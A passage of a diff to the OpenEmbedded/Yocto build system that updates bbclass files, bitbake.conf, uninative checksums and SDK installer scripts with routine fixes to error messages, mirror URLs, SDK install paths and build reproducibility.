+ # don't unpack, patch, configure again, just archive the already
+ # configured ${S}
+ elif not (pn == 'libtool-native' or is_work_shared(d)):
def runTask(task):
prefuncs = d.getVarFlag(task, 'prefuncs') or ''
for func in prefuncs.split():
@@ -483,6 +486,9 @@ python do_unpack_and_patch() {
src_orig = '%s.orig' % src
oe.path.copytree(src, src_orig)
+ if bb.data.inherits_class('dos2unix', d):
+ bb.build.exec_func('do_convert_crlf_to_lf', d)
+
# Make sure gcc and kernel sources are patched only once
if not (d.getVar('SRC_URI') == "" or is_work_shared(d)):
bb.build.exec_func('do_patch', d)
diff --git a/meta/classes/cross-canadian.bbclass b/meta/classes/cross-canadian.bbclass
index f5c9f61595b..3fc9cac442b 100644
--- a/meta/classes/cross-canadian.bbclass
+++ b/meta/classes/cross-canadian.bbclass
@@ -155,7 +155,7 @@ libexecdir = "${exec_prefix}/libexec/${TARGET_ARCH}${TARGET_VENDOR}-${TARGET_OS}
FILES_${PN} = "${prefix}"
-export PKG_CONFIG_DIR = "${STAGING_DIR_HOST}${layout_libdir}/pkgconfig"
+export PKG_CONFIG_DIR = "${STAGING_DIR_HOST}${exec_prefix}/lib/pkgconfig"
export PKG_CONFIG_SYSROOT_DIR = "${STAGING_DIR_HOST}"
do_populate_sysroot[stamp-extra-info] = ""
diff --git a/meta/classes/cve-check.bbclass b/meta/classes/cve-check.bbclass
index 112ee3379d3..4fa1a64f857 100644
--- a/meta/classes/cve-check.bbclass
+++ b/meta/classes/cve-check.bbclass
@@ -20,7 +20,7 @@
# the only method to check against CVEs. Running this tool
# doesn't guarantee your packages are free of CVEs.
-# The product name that the CVE database uses. Defaults to BPN, but may need to
+# The product name that the CVE database uses defaults to BPN, but may need to
# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
CVE_PRODUCT ??= "${BPN}"
CVE_VERSION ??= "${PV}"
@@ -56,11 +56,11 @@ CVE_CHECK_WHITELIST ?= ""
# Layers to be excluded
CVE_CHECK_LAYER_EXCLUDELIST ??= ""
-# Layers to be included
+# Layers to be included
CVE_CHECK_LAYER_INCLUDELIST ??= ""
-# set to "alphabetical" for version using single alphabetical character as increament release
+# set to "alphabetical" for version using single alphabetical character as increment release
CVE_VERSION_SUFFIX ??= ""
python cve_save_summary_handler () {
@@ -166,9 +166,12 @@ def get_patches_cves(d):
pn = d.getVar("PN")
cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
- # Matches last CVE-1234-211432 in the file name, also if written
- # with small letters. Not supporting multiple CVE id's in a single
- # file name.
+ # Matches the last "CVE-YYYY-ID" in the file name, also if written
+ # in lowercase. Possible to have multiple CVE IDs in a single
+ # file name, but only the last one will be detected from the file name.
+ # However, patch files contents addressing multiple CVE IDs are supported
+ # (cve_match regular expression)
+
cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
patched_cves = set()
@@ -230,7 +233,7 @@ def check_cves(d, patched_cves):
return ([], [], [])
pv = d.getVar("CVE_VERSION").split("+git")[0]
- # If the recipe has been whitlisted we return empty lists
+ # If the recipe has been whitelisted we return empty lists
if pn in d.getVar("CVE_CHECK_PN_WHITELIST").split():
bb.note("Recipe has been whitelisted, skipping check")
return ([], [], [])
@@ -355,7 +358,7 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
if include_layers and layer not in include_layers:
return
- nvd_link = "https://web.nvd.nist.gov/view/vuln/detail?vulnId="
+ nvd_link = "https://nvd.nist.gov/vuln/detail/"
write_string = ""
unpatched_cves = []
bb.utils.mkdirhier(os.path.dirname(cve_file))
diff --git a/meta/classes/devupstream.bbclass b/meta/classes/devupstream.bbclass
index 7780c5482c6..97e137cb404 100644
--- a/meta/classes/devupstream.bbclass
+++ b/meta/classes/devupstream.bbclass
@@ -4,7 +4,7 @@
#
# Usage:
# BBCLASSEXTEND = "devupstream:target"
-# SRC_URI_class-devupstream = "git://git.example.com/example"
+# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master"
# SRCREV_class-devupstream = "abcdef"
#
# If the first entry in SRC_URI is a git: URL then S is rewritten to
diff --git a/meta/classes/externalsrc.bbclass b/meta/classes/externalsrc.bbclass
index 3d6b80bee2b..9fe9d36f767 100644
--- a/meta/classes/externalsrc.bbclass
+++ b/meta/classes/externalsrc.bbclass
@@ -109,6 +109,15 @@ python () {
if local_srcuri and task in fetch_tasks:
continue
bb.build.deltask(task, d)
+ if bb.data.inherits_class('reproducible_build', d) and task == 'do_unpack':
+ # The reproducible_build's create_source_date_epoch_stamp function must
+ # be run after the source is available and before the
+ # do_deploy_source_date_epoch task. In the normal case, it's attached
+ # to do_unpack as a postfuncs, but since we removed do_unpack (above)
+ # we need to move the function elsewhere. The easiest thing to do is
+ # move it into the prefuncs of the do_deploy_source_date_epoch task.
+ # This is safe, as externalsrc runs with the source already unpacked.
+ d.prependVarFlag('do_deploy_source_date_epoch', 'prefuncs', 'create_source_date_epoch_stamp ')
d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ")
d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ")
diff --git a/meta/classes/image_types.bbclass b/meta/classes/image_types.bbclass
index 8028691405a..cee577d5dad 100644
--- a/meta/classes/image_types.bbclass
+++ b/meta/classes/image_types.bbclass
@@ -225,7 +225,7 @@ EXTRA_IMAGECMD_jffs2 ?= "--pad ${JFFS2_ENDIANNESS} --eraseblock=${JFFS2_ERASEBLO
EXTRA_IMAGECMD_ext2 ?= "-i 4096"
EXTRA_IMAGECMD_ext3 ?= "-i 4096"
EXTRA_IMAGECMD_ext4 ?= "-i 4096"
-EXTRA_IMAGECMD_btrfs ?= "-n 4096"
+EXTRA_IMAGECMD_btrfs ?= "-n 4096 --shrink"
EXTRA_IMAGECMD_f2fs ?= ""
do_image_cpio[depends] += "cpio-native:do_populate_sysroot"
diff --git a/meta/classes/kernel-yocto.bbclass b/meta/classes/kernel-yocto.bbclass
index d38b60f519b..8878573f6fa 100644
--- a/meta/classes/kernel-yocto.bbclass
+++ b/meta/classes/kernel-yocto.bbclass
@@ -341,6 +341,21 @@ do_kernel_checkout() {
fi
fi
cd ${S}
+
+ # convert any remote branches to local tracking ones
+ for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
+ b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
+ git show-ref --quiet --verify -- "refs/heads/$b"
+ if [ $? -ne 0 ]; then
+ git branch $b $i > /dev/null
+ fi
+ done
+
+ # Create a working tree copy of the kernel by checking out a branch
+ machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
+
+ # checkout and clobber any unimportant files
+ git checkout -f ${machine_branch}
else
# case: we have no git repository at all.
# To support low bandwidth options for building the kernel, we'll just
@@ -362,21 +377,6 @@ do_kernel_checkout() {
git commit -q -m "baseline commit: creating repo for ${PN}-${PV}"
git clean -d -f
fi
-
- # convert any remote branches to local tracking ones
- for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
- b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
- git show-ref --quiet --verify -- "refs/heads/$b"
- if [ $? -ne 0 ]; then
- git branch $b $i > /dev/null
- fi
- done
-
- # Create a working tree copy of the kernel by checking out a branch
- machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
-
- # checkout and clobber any unimportant files
- git checkout -f ${machine_branch}
}
do_kernel_checkout[dirs] = "${S} ${WORKDIR}"
diff --git a/meta/classes/license.bbclass b/meta/classes/license.bbclass
index f7978e266b6..0d0faa28d79 100644
--- a/meta/classes/license.bbclass
+++ b/meta/classes/license.bbclass
@@ -31,7 +31,7 @@ python do_populate_lic() {
f.write("%s: %s\n" % (key, info[key]))
}
-PSEUDO_IGNORE_PATHS .= ",${@','.join(((d.getVar('COMMON_LICENSE_DIR') or '') + ' ' + (d.getVar('LICENSE_PATH') or '')).split())}"
+PSEUDO_IGNORE_PATHS .= ",${@','.join(((d.getVar('COMMON_LICENSE_DIR') or '') + ' ' + (d.getVar('LICENSE_PATH') or '') + ' ' + d.getVar('COREBASE') + '/meta/COPYING').split())}"
# it would be better to copy them in do_install_append, but find_license_filesa is python
python perform_packagecopy_prepend () {
enabled = oe.data.typed_value('LICENSE_CREATE_PACKAGE', d)
diff --git a/meta/classes/mirrors.bbclass b/meta/classes/mirrors.bbclass
index 87bba41472e..8a2c153d9b4 100644
--- a/meta/classes/mirrors.bbclass
+++ b/meta/classes/mirrors.bbclass
@@ -62,6 +62,8 @@ ftp://.*/.* http://sources.openembedded.org/ \n \
npm://.*/?.* http://sources.openembedded.org/ \n \
${CPAN_MIRROR} http://cpan.metacpan.org/ \n \
${CPAN_MIRROR} http://search.cpan.org/CPAN/ \n \
+https?$://downloads.yoctoproject.org/releases/uninative/ https://mirrors.kernel.org/yocto/uninative/ \n \
+https?://downloads.yoctoproject.org/mirror/sources/ https://mirrors.kernel.org/yocto-sources/ \
"
# Use MIRRORS to provide git repo fallbacks using the https protocol, for cases
diff --git a/meta/classes/multilib.bbclass b/meta/classes/multilib.bbclass
index 9f726e45371..2ef75c0d165 100644
--- a/meta/classes/multilib.bbclass
+++ b/meta/classes/multilib.bbclass
@@ -105,7 +105,6 @@ python __anonymous () {
d.setVar("LINGUAS_INSTALL", "")
# FIXME, we need to map this to something, not delete it!
d.setVar("PACKAGE_INSTALL_ATTEMPTONLY", "")
- bb.build.deltask('do_populate_sdk', d)
bb.build.deltask('do_populate_sdk_ext', d)
return
}
diff --git a/meta/classes/package.bbclass b/meta/classes/package.bbclass
index e3f0a7060bf..5e51b89184f 100644
--- a/meta/classes/package.bbclass
+++ b/meta/classes/package.bbclass
@@ -2079,12 +2079,12 @@ python package_do_pkgconfig () {
for pkg in packages.split():
pkgconfig_provided[pkg] = []
pkgconfig_needed[pkg] = []
- for file in pkgfiles[pkg]:
+ for file in sorted(pkgfiles[pkg]):
m = pc_re.match(file)
if m:
pd = bb.data.init()
name = m.group(1)
- pkgconfig_provided[pkg].append(name)
+ pkgconfig_provided[pkg].append(os.path.basename(name))
if not os.access(file, os.R_OK):
continue
with open(file, 'r') as f:
@@ -2107,7 +2107,7 @@ python package_do_pkgconfig () {
pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist")
if pkgconfig_provided[pkg] != []:
with open(pkgs_file, 'w') as f:
- for p in pkgconfig_provided[pkg]:
+ for p in sorted(pkgconfig_provided[pkg]):
f.write('%s\n' % p)
# Go from least to most specific since the last one found wins
diff --git a/meta/classes/package_ipk.bbclass b/meta/classes/package_ipk.bbclass
index 600b3ac90ce..67d6007e11c 100644
--- a/meta/classes/package_ipk.bbclass
+++ b/meta/classes/package_ipk.bbclass
@@ -230,8 +230,8 @@ def ipk_write_pkg(pkg, d):
shell=True)
if d.getVar('IPK_SIGN_PACKAGES') == '1':
- ipkver = "%s-%s" % (d.getVar('PKGV'), d.getVar('PKGR'))
- ipk_to_sign = "%s/%s_%s_%s.ipk" % (pkgoutdir, pkgname, ipkver, d.getVar('PACKAGE_ARCH'))
+ ipkver = "%s-%s" % (localdata.getVar('PKGV'), localdata.getVar('PKGR'))
+ ipk_to_sign = "%s/%s_%s_%s.ipk" % (pkgoutdir, pkgname, ipkver, localdata.getVar('PACKAGE_ARCH'))
sign_ipk(d, ipk_to_sign)
finally:
diff --git a/meta/classes/patch.bbclass b/meta/classes/patch.bbclass
index cd491a563de..72bb1eb9466 100644
--- a/meta/classes/patch.bbclass
+++ b/meta/classes/patch.bbclass
@@ -131,6 +131,9 @@ python patch_do_patch() {
patchdir = parm["patchdir"]
if not os.path.isabs(patchdir):
patchdir = os.path.join(s, patchdir)
+ if not os.path.isdir(patchdir):
+ bb.fatal("Target directory '%s' not found, patchdir '%s' is incorrect in patch file '%s'" %
+ (patchdir, parm["patchdir"], parm['patchname']))
else:
patchdir = s
@@ -147,12 +150,12 @@ python patch_do_patch() {
patchset.Import({"file":local, "strippath": parm['striplevel']}, True)
except Exception as exc:
bb.utils.remove(process_tmpdir, True)
- bb.fatal(str(exc))
+ bb.fatal("Importing patch '%s' with striplevel '%s'\n%s" % (parm['patchname'], parm['striplevel'], str(exc)))
try:
resolver.Resolve()
except bb.BBHandledException as e:
bb.utils.remove(process_tmpdir, True)
- bb.fatal(str(e))
+ bb.fatal("Applying patch '%s' on target directory '%s'\n%s" % (parm['patchname'], patchdir, str(e)))
bb.utils.remove(process_tmpdir, True)
del os.environ['TMPDIR']
diff --git a/meta/classes/populate_sdk_base.bbclass b/meta/classes/populate_sdk_base.bbclass
index 33ba3fc3c1c..2d33611ddd4 100644
--- a/meta/classes/populate_sdk_base.bbclass
+++ b/meta/classes/populate_sdk_base.bbclass
@@ -66,7 +66,7 @@ python () {
SDK_RDEPENDS = "${TOOLCHAIN_TARGET_TASK} ${TOOLCHAIN_HOST_TASK}"
SDK_DEPENDS = "virtual/fakeroot-native ${SDK_ARCHIVE_DEPENDS} cross-localedef-native nativesdk-qemuwrapper-cross ${@' '.join(["%s-qemuwrapper-cross" % m for m in d.getVar("MULTILIB_VARIANTS").split()])} qemuwrapper-cross"
-PATH_prepend = "${STAGING_DIR_HOST}${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
+PATH_prepend = "${WORKDIR}/recipe-sysroot/${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
SDK_DEPENDS += "nativesdk-glibc-locale"
# We want the MULTIARCH_TARGET_SYS to point to the TUNE_PKGARCH, not PACKAGE_ARCH as it
@@ -280,6 +280,7 @@ EOF
# substitute variables
sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \
-e 's#@SDKPATH@#${SDKPATH}#g' \
+ -e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \
-e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \
-e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \
-e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \
diff --git a/meta/classes/reproducible_build.bbclass b/meta/classes/reproducible_build.bbclass
index 1277764faba..62655c2a5bc 100644
--- a/meta/classes/reproducible_build.bbclass
+++ b/meta/classes/reproducible_build.bbclass
@@ -90,11 +90,14 @@ python create_source_date_epoch_stamp() {
}
def get_source_date_epoch_value(d):
- cached = d.getVar('__CACHED_SOURCE_DATE_EPOCH')
- if cached:
+ epochfile = d.getVar('SDE_FILE')
+ cached, efile = d.getVar('__CACHED_SOURCE_DATE_EPOCH') or (None, None)
+ if cached and efile == epochfile:
return cached
- epochfile = d.getVar('SDE_FILE')
+ if cached and epochfile != efile:
+ bb.debug(1, "Epoch file changed from %s to %s" % (efile, epochfile))
+
source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
try:
with open(epochfile, 'r') as f:
@@ -112,7 +115,7 @@ def get_source_date_epoch_value(d):
except FileNotFoundError:
bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch))
- d.setVar('__CACHED_SOURCE_DATE_EPOCH', str(source_date_epoch))
+ d.setVar('__CACHED_SOURCE_DATE_EPOCH', (str(source_date_epoch), epochfile))
return str(source_date_epoch)
export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}"
diff --git a/meta/classes/rm_work.bbclass b/meta/classes/rm_work.bbclass
index 01c2ab1c78e..2d5a56c238d 100644
--- a/meta/classes/rm_work.bbclass
+++ b/meta/classes/rm_work.bbclass
@@ -73,7 +73,7 @@ do_rm_work () {
# sstate version since otherwise we'd need to leave 'plaindirs' around
# such as 'packages' and 'packages-split' and these can be large. No end
# of chain tasks depend directly on do_package anymore.
- rm -f $i;
+ rm -f -- $i;
;;
*_setscene*)
# Skip stamps which are already setscene versions
@@ -90,7 +90,7 @@ do_rm_work () {
;;
esac
done
- rm -f $i
+ rm -f -- $i
esac
done
@@ -100,9 +100,9 @@ do_rm_work () {
# Retain only logs and other files in temp, safely ignore
# failures of removing pseudo folers on NFS2/3 server.
if [ $dir = 'pseudo' ]; then
- rm -rf $dir 2> /dev/null || true
+ rm -rf -- $dir 2> /dev/null || true
elif ! echo "$excludes" | grep -q -w "$dir"; then
- rm -rf $dir
+ rm -rf -- $dir
fi
done
}
diff --git a/meta/classes/sstate.bbclass b/meta/classes/sstate.bbclass
index 2b5d94dd1f9..da292259833 100644
--- a/meta/classes/sstate.bbclass
+++ b/meta/classes/sstate.bbclass
@@ -20,7 +20,7 @@ def generate_sstatefn(spec, hash, taskname, siginfo, d):
components = spec.split(":")
# Fields 0,5,6 are mandatory, 1 is most useful, 2,3,4 are just for information
# 7 is for the separators
- avail = (254 - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
+ avail = (limit - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
components[2] = components[2][:avail]
components[3] = components[3][:avail]
components[4] = components[4][:avail]
@@ -123,8 +123,6 @@ SSTATE_HASHEQUIV_REPORT_TASKDATA[doc] = "Report additional useful data to the \
python () {
if bb.data.inherits_class('native', d):
d.setVar('SSTATE_PKGARCH', d.getVar('BUILD_ARCH', False))
- if d.getVar("PN") == "pseudo-native":
- d.appendVar('SSTATE_PKGARCH', '_${ORIGNATIVELSBSTRING}')
elif bb.data.inherits_class('crosssdk', d):
d.setVar('SSTATE_PKGARCH', d.expand("${BUILD_ARCH}_${SDK_ARCH}_${SDK_OS}"))
elif bb.data.inherits_class('cross', d):
@@ -707,6 +705,7 @@ def sstate_package(ss, d):
pass
except OSError as e:
# Handle read-only file systems gracefully
+ import errno
if e.errno != errno.EROFS:
raise e
@@ -732,6 +731,7 @@ def pstaging_fetch(sstatefetch, d):
localdata.setVar('FILESPATH', dldir)
localdata.setVar('DL_DIR', dldir)
localdata.setVar('PREMIRRORS', mirrors)
+ localdata.setVar('SRCPV', d.getVar('SRCPV'))
# if BB_NO_NETWORK is set but we also have SSTATE_MIRROR_ALLOW_NETWORK,
# we'll want to allow network access for the current set of fetches.
@@ -756,6 +756,9 @@ def pstaging_fetch(sstatefetch, d):
except bb.fetch2.BBFetchException:
pass
+pstaging_fetch[vardepsexclude] += "SRCPV"
+
+
def sstate_setscene(d):
shared_state = sstate_state_fromvars(d)
accelerate = sstate_installpkg(shared_state, d)
@@ -797,7 +800,7 @@ sstate_task_postfunc[dirs] = "${WORKDIR}"
sstate_create_package () {
# Exit early if it already exists
if [ -e ${SSTATE_PKG} ]; then
- [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG}
+ touch ${SSTATE_PKG} 2>/dev/null || true
return
fi
@@ -831,7 +834,7 @@ sstate_create_package () {
else
rm $TFILE
fi
- [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG}
+ touch ${SSTATE_PKG} 2>/dev/null || true
}
python sstate_sign_package () {
@@ -860,12 +863,12 @@ python sstate_report_unihash() {
#
sstate_unpack_package () {
tar -xvzf ${SSTATE_PKG}
- # update .siginfo atime on local/NFS mirror
- [ -O ${SSTATE_PKG}.siginfo ] && [ -w ${SSTATE_PKG}.siginfo ] && [ -h ${SSTATE_PKG}.siginfo ] && touch -a ${SSTATE_PKG}.siginfo
- # Use "! -w ||" to return true for read only files
- [ ! -w ${SSTATE_PKG} ] || touch --no-dereference ${SSTATE_PKG}
- [ ! -w ${SSTATE_PKG}.sig ] || [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig
- [ ! -w ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo
+ # update .siginfo atime on local/NFS mirror if it is a symbolic link
+ [ ! -h ${SSTATE_PKG}.siginfo ] || touch -a ${SSTATE_PKG}.siginfo 2>/dev/null || true
+ # update each symbolic link instead of any referenced file
+ touch --no-dereference ${SSTATE_PKG} 2>/dev/null || true
+ [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 2>/dev/null || true
+ [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 2>/dev/null || true
}
BB_HASHCHECK_FUNCTION = "sstate_checkhashes"
@@ -1020,6 +1023,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
bb.parse.siggen.checkhashes(sq_data, missed, found, d)
return found
+setscene_depvalid[vardepsexclude] = "SSTATE_EXCLUDEDEPS_SYSROOT"
BB_SETSCENE_DEPVALID = "setscene_depvalid"
@@ -1153,6 +1157,7 @@ python sstate_eventhandler() {
pass
except OSError as e:
# Handle read-only file systems gracefully
+ import errno
if e.errno != errno.EROFS:
raise e
diff --git a/meta/classes/terminal.bbclass b/meta/classes/terminal.bbclass
index 6059ae95e0d..a564ee74947 100644
--- a/meta/classes/terminal.bbclass
+++ b/meta/classes/terminal.bbclass
@@ -26,6 +26,9 @@ def emit_terminal_func(command, envdata, d):
bb.utils.mkdirhier(os.path.dirname(runfile))
with open(runfile, 'w') as script:
+ # Override the shell shell_trap_code specifies.
+ # If our shell is bash, we might well face silent death.
+ script.write("#!/bin/bash\n")
script.write(bb.build.shell_trap_code())
bb.data.emit_func(cmd_func, script, envdata)
script.write(cmd_func)
@@ -37,7 +40,7 @@ def emit_terminal_func(command, envdata, d):
def oe_terminal(command, title, d):
import oe.data
import oe.terminal
-
+
envdata = bb.data.init()
for v in os.environ:
diff --git a/meta/classes/testimage.bbclass b/meta/classes/testimage.bbclass
index e6137595031..538ec4fc8a7 100644
--- a/meta/classes/testimage.bbclass
+++ b/meta/classes/testimage.bbclass
@@ -230,9 +230,10 @@ def testimage_main(d):
tdname = "%s.testdata.json" % image_name
try:
- td = json.load(open(tdname, "r"))
- except (FileNotFoundError) as err:
- bb.fatal('File %s Not Found. Have you built the image with INHERIT+="testimage" in the conf/local.conf?' % tdname)
+ with open(tdname, "r") as f:
+ td = json.load(f)
+ except FileNotFoundError as err:
+ bb.fatal('File %s not found (%s).\nHave you built the image with INHERIT += "testimage" in the conf/local.conf?' % (tdname, err))
# Some variables need to be updates (mostly paths) with the
# ones of the current environment because some tests require them.
diff --git a/meta/classes/uninative.bbclass b/meta/classes/uninative.bbclass
index 1e19917a97f..3c7ccd66f43 100644
--- a/meta/classes/uninative.bbclass
+++ b/meta/classes/uninative.bbclass
@@ -100,7 +100,7 @@ ${UNINATIVE_STAGING_DIR}-uninative/relocate_sdk.py \
${UNINATIVE_LOADER} \
${UNINATIVE_LOADER} \
${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \
- ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so" % chksum)
+ ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so*" % chksum)
subprocess.check_output(cmd, shell=True)
with open(loaderchksum, "w") as f:
diff --git a/meta/classes/utils.bbclass b/meta/classes/utils.bbclass
index 120bcc64a64..072ea1f63c7 100644
--- a/meta/classes/utils.bbclass
+++ b/meta/classes/utils.bbclass
@@ -214,7 +214,7 @@ create_cmdline_wrapper () {
#!/bin/bash
realpath=\`readlink -fn \$0\`
realdir=\`dirname \$realpath\`
-exec -a \`dirname \$realpath\`/$cmdname \`dirname \$realpath\`/$cmdname.real $cmdoptions "\$@"
+exec -a \$realdir/$cmdname \$realdir/$cmdname.real $cmdoptions "\$@"
END
chmod +x $cmd
}
diff --git a/meta/conf/bitbake.conf b/meta/conf/bitbake.conf
index 385fc7dd552..d0b92a996ac 100644
--- a/meta/conf/bitbake.conf
+++ b/meta/conf/bitbake.conf
@@ -422,8 +422,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}"
SDK_NAME_PREFIX ?= "oecore"
SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}"
-SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
+SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath"
SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}"
+# The path to default to installing the SDK to
+SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
##################################################################
# Kernel info.
@@ -638,7 +640,7 @@ APACHE_MIRROR = "https://archive.apache.org/dist"
DEBIAN_MIRROR = "http://ftp.debian.org/debian/pool"
GENTOO_MIRROR = "http://distfiles.gentoo.org/distfiles"
GNOME_GIT = "git://gitlab.gnome.org/GNOME"
-GNOME_MIRROR = "https://ftp.gnome.org/pub/GNOME/sources"
+GNOME_MIRROR = "https://download.gnome.org/sources/"
GNU_MIRROR = "https://ftp.gnu.org/gnu"
GNUPG_MIRROR = "https://www.gnupg.org/ftp/gcrypt"
GPE_MIRROR = "http://gpe.linuxtogo.org/download/source"
diff --git a/meta/conf/distro/include/default-distrovars.inc b/meta/conf/distro/include/default-distrovars.inc
index 433d4b6651d..0240589c815 100644
--- a/meta/conf/distro/include/default-distrovars.inc
+++ b/meta/conf/distro/include/default-distrovars.inc
@@ -47,5 +47,5 @@ KERNEL_IMAGETYPES ??= "${KERNEL_IMAGETYPE}"
# The CONNECTIVITY_CHECK_URIS are used to test whether we can succesfully
# fetch from the network (and warn you if not). To disable the test set
# the variable to be empty.
-# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master
+# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master;branch=master
CONNECTIVITY_CHECK_URIS ?= "https://www.example.com/"
diff --git a/meta/conf/distro/include/maintainers.inc b/meta/conf/distro/include/maintainers.inc
index 62763318576..5d453a6fcd1 100644
--- a/meta/conf/distro/include/maintainers.inc
+++ b/meta/conf/distro/include/maintainers.inc
@@ -4,7 +4,7 @@
#
# Please submit any patches against recipes in meta to the
# OE-Core mail list (openembedded-core@lists.openembedded.org)
-# For recipes in meta-yocto please use the Poky list (poky@yoctoproject.org)
+# For recipes in meta-yocto please use the Poky list (poky@lists.yoctoproject.org)
#
# If you have problems with or questions about a particular recipe, feel
# free to contact the maintainer directly (cc:ing the appropriate mailing list
diff --git a/meta/conf/distro/include/yocto-uninative.inc b/meta/conf/distro/include/yocto-uninative.inc
index 740cca0ecfd..3165fc93b89 100644
--- a/meta/conf/distro/include/yocto-uninative.inc
+++ b/meta/conf/distro/include/yocto-uninative.inc
@@ -6,9 +6,9 @@
# to the distro running on the build machine.
#
-UNINATIVE_MAXGLIBCVERSION = "2.33"
+UNINATIVE_MAXGLIBCVERSION = "2.34"
-UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/3.2/"
-UNINATIVE_CHECKSUM[aarch64] ?= "4f0872cdca2775b637a8a99815ca5c8dd42146abe903a24a50ee0448358c764b"
-UNINATIVE_CHECKSUM[i686] ?= "e2eeab92e67263db37d9bb6d4c58579abd1f47ff4cded3171bde572fece124b2"
-UNINATIVE_CHECKSUM[x86_64] ?= "3ee8c7d55e2d4c7ae3887cddb97219f97b94efddfeee2e24923c0cb0e8ce84c6"
+UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/3.4/"
+UNINATIVE_CHECKSUM[aarch64] ?= "3013cdda8f0dc6639ce1c80f33eabce66f06b890bd5b58739a6d7a92a0bb7100"
+UNINATIVE_CHECKSUM[i686] ?= "abed500de584aad63ec237546db20cdd0c69d8870a6f8e94ac31721ace64b376"
+UNINATIVE_CHECKSUM[x86_64] ?= "126f4f7f6f21084ee140dac3eb4c536b963837826b7c38599db0b512c3377ba2"
diff --git a/meta/conf/multilib.conf b/meta/conf/multilib.conf
index d231107f8b0..e9767c73b60 100644
--- a/meta/conf/multilib.conf
+++ b/meta/conf/multilib.conf
@@ -11,6 +11,8 @@ STAGING_DIR_TARGET = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
RECIPE_SYSROOT = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
RECIPE_SYSROOT_class-native = "${WORKDIR}/recipe-sysroot"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${MLPREFIX}recipe-sysroot"
+
INHERIT += "multilib_global"
BBCLASSEXTEND_append = " ${MULTILIBS}"
diff --git a/meta/files/toolchain-shar-extract.sh b/meta/files/toolchain-shar-extract.sh
index dd9342758b4..4386b985bb0 100644
--- a/meta/files/toolchain-shar-extract.sh
+++ b/meta/files/toolchain-shar-extract.sh
@@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then
exit 1
fi
-DEFAULT_INSTALL_DIR="@SDKPATH@"
+SDK_BUILD_PATH="@SDKPATH@"
+DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@"
SUDO_EXEC=""
EXTRA_TAR_OPTIONS=""
target_sdk_dir=""
diff --git a/meta/files/toolchain-shar-relocate.sh b/meta/files/toolchain-shar-relocate.sh
index 54337412966..3ece04db0a4 100644
--- a/meta/files/toolchain-shar-relocate.sh
+++ b/meta/files/toolchain-shar-relocate.sh
@@ -61,7 +61,7 @@ done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \
-e "$target_sdk_dir/post-relocate-setup" \
-e "$target_sdk_dir/${0##*/}" | \
xargs -n100 $SUDO_EXEC sed -i \
- -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \
+ -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \
-e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \
